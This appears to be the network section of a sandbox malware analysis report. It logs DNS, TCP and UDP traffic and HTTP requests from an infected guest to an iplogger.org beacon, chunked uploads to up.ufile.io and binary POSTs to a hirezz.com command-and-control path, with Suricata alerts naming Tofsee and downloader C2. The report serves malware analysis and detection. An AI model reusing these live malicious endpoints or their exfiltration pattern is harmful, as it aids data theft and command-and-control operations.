Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
up.ufile.io | 104.27.194.88 | |
hirezz.com | 162.144.12.143 | |
iplogger.org | 88.99.66.31 | |
TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.102:49812 | 104.27.194.88:443 | up.ufile.io |
192.168.56.102:49813 | 104.27.194.88:443 | up.ufile.io |
192.168.56.102:49814 | 104.27.194.88:443 | up.ufile.io |
192.168.56.102:49807 | 162.144.12.143:80 | hirezz.com |
192.168.56.102:49809 | 162.144.12.143:80 | hirezz.com |
192.168.56.102:49797 | 172.217.25.14:443 | |
192.168.56.102:49811 | 88.99.66.31:443 | iplogger.org |
UDP Requests
Source | Destination |
---|---|
192.168.56.102:50839 | 164.124.101.2:53 |
192.168.56.102:57660 | 164.124.101.2:53 |
192.168.56.102:61459 | 164.124.101.2:53 |
192.168.56.102:137 | 192.168.56.255:137 |
192.168.56.102:138 | 192.168.56.255:138 |
192.168.56.102:49152 | 239.255.255.250:3702 |
192.168.56.102:56752 | 239.255.255.250:1900 |
192.168.56.102:56754 | 239.255.255.250:3702 |
192.168.56.102:56756 | 239.255.255.250:3702 |
192.168.56.102:57661 | 239.255.255.250:3702 |
8.8.8.8:53 | 192.168.56.102:57660 |
GET 200 https://iplogger.org/1ib2a7
REQUEST
GET /1ib2a7 HTTP/1.1
Host: iplogger.org
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 23 Apr 2021 01:07:48 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=h6g3fea45tea20omfp2hctfsb0; path=/; HttpOnly
Pragma: no-cache
Set-Cookie: clhf03028ja=175.208.134.150; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=259908123; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Answers:
whoami: 2d939b5aee78649ba5dcf483ea0aaa5e19e86948b4778e339f04998c89927566
Strict-Transport-Security: max-age=31536000; preload
X-Frame-Options: DENY
POST 200 https://up.ufile.io/v1/upload/create_session
REQUEST
POST /v1/upload/create_session HTTP/1.1
Host: up.ufile.io
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:50 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 43
Connection: keep-alive
Set-Cookie: __cfduid=ded21f4c5f8147145d2b9fdf1a8cb446c1619140069; expires=Sun, 23-May-21 01:07:49 GMT; path=/; domain=.ufile.io; HttpOnly; SameSite=Lax; Secure
Access-Control-Allow-Origin:
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Access-Control-Request-Method, Access-Control-Allow-Headers, x-api-key
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 099ddde0be0000eb8dca385000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ifopkls6IKTqeH6yf1qq%2FLMYRSu9OjfWHU4Os5vPsFCqGTCoEmQLbKP%2FIM6FdP6kEEpVViq1vcdkWws90pfOKiZzsd6TJcUA17EUwlGeBYI8I1zYZi3p"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Set-Cookie: __cfduid=d09b566a8c613ca15b1f70ce1ab72e2511619140069; expires=Sun, 23-May-21 01:07:49 GMT; path=/; domain=.ufile.io; HttpOnly; SameSite=Lax; Secure
Set-Cookie: __cflb=0H28vJQzgt4wRhVN8rwbSixBAYxN2M9Ho7zPmpisByn; SameSite=None; Secure; path=/; expires=Sat, 24-Apr-21 01:07:50 GMT; HttpOnly
Server: cloudflare
CF-RAY: 6443327acb2feb8d-LAX
POST 200 https://up.ufile.io/v1/upload/chunk
REQUEST
POST /v1/upload/chunk HTTP/1.1
Content-Type: multipart/form-data; boundary=WebKitFormBoundaryu8FzpUGNDgydoA4z
Host: up.ufile.io
Content-Length: 279975
Cache-Control: no-cache
Cookie: __cfduid=d09b566a8c613ca15b1f70ce1ab72e2511619140069; __cflb=0H28vJQzgt4wRhVN8rwbSixBAYxN2M9Ho7zPmpisByn
RESPONSE
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:53 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 24
Connection: keep-alive
Access-Control-Allow-Origin:
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Access-Control-Request-Method, Access-Control-Allow-Headers, x-api-key
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 099ddde61d0000362ae5399000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=eKn%2B%2FaKWK7cOOn1YfaG5XMmSqowOw1Cy1khwqeKnm2Zed0b0k%2FhqdKRwUs1vTUVdgw6ufnq99enetOnSKle3cQ%2Fmn59RK9NrDny92lT50URVNaHsfBiL"}],"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Server: cloudflare
CF-RAY: 644332835c38362a-LAX
POST 200 https://up.ufile.io/v1/upload/finalise
REQUEST
POST /v1/upload/finalise HTTP/1.1
Host: up.ufile.io
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Cache-Control: no-cache
Cookie: __cfduid=d09b566a8c613ca15b1f70ce1ab72e2511619140069; __cflb=0H28vJQzgt4wRhVN8rwbSixBAYxN2M9Ho7zPmpisByn
RESPONSE
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:54 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin:
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Access-Control-Request-Method, Access-Control-Allow-Headers, x-api-key
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 099dddf11d000042eafba3f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1EFKp8QO0GNep%2Ffqm7q7XWt72lVs3CdTf%2FsH2rCo2ntyRsVlhlGnezY06bDu8slBxzbc2nP7fpr2B%2BsKqLBWLpK57h%2FPERYGaUywSbf%2F7VloAw6TO3ZR"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Server: cloudflare
CF-RAY: 64433294fe3f42ea-LAX
GET 200 http://hirezz.com/test/includes/image.php
REQUEST
GET /test/includes/image.php HTTP/1.1
Connection: Keep-Alive
Host: hirezz.com
RESPONSE
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:43 GMT
Server: nginx/1.19.5
Content-Type: text/html; charset=UTF-8
Content-Length: 12
X-Server-Cache: true
X-Proxy-Cache: HIT
GET 200 http://hirezz.com/test/includes/image.php?id=00009CF9F2321904909678
REQUEST
GET /test/includes/image.php?id=00009CF9F2321904909678 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: hirezz.com
Connection: Keep-Alive
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:44 GMT
Server: nginx/1.19.5
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
X-Server-Cache: false
Transfer-Encoding: chunked
POST 200 http://hirezz.com/test/includes/image.php
REQUEST
POST /test/includes/image.php HTTP/1.1
Content-Type: application/octet-stream
Content-Encoding: binary
Host: hirezz.com
Content-Length: 62222
Connection: Keep-Alive
Cache-Control: no-cache
RESPONSE
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 01:07:46 GMT
Server: Apache
Content-Length: 2
Content-Type: text/html; charset=UTF-8
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49812 -> 104.27.194.88:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49813 -> 104.27.194.88:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49809 -> 162.144.12.143:80 | 2032342 | ET MALWARE Win32/Unk Downloader CnC Activity | Malware Command and Control Activity Detected |
TCP 192.168.56.102:49814 -> 104.27.194.88:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49811 -> 88.99.66.31:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49812 -> 104.27.194.88:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 47:ea:38:25:90:4e:67:30:f9:3d:f5:b5:f2:9a:2a:da:67:5a:ef:97 |
TLSv1 192.168.56.102:49813 -> 104.27.194.88:443 | None | None | None |
TLSv1 192.168.56.102:49814 -> 104.27.194.88:443 | None | None | None |
TLSv1 192.168.56.102:49811 -> 88.99.66.31:443 | C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
Snort Alerts
No Snort Alerts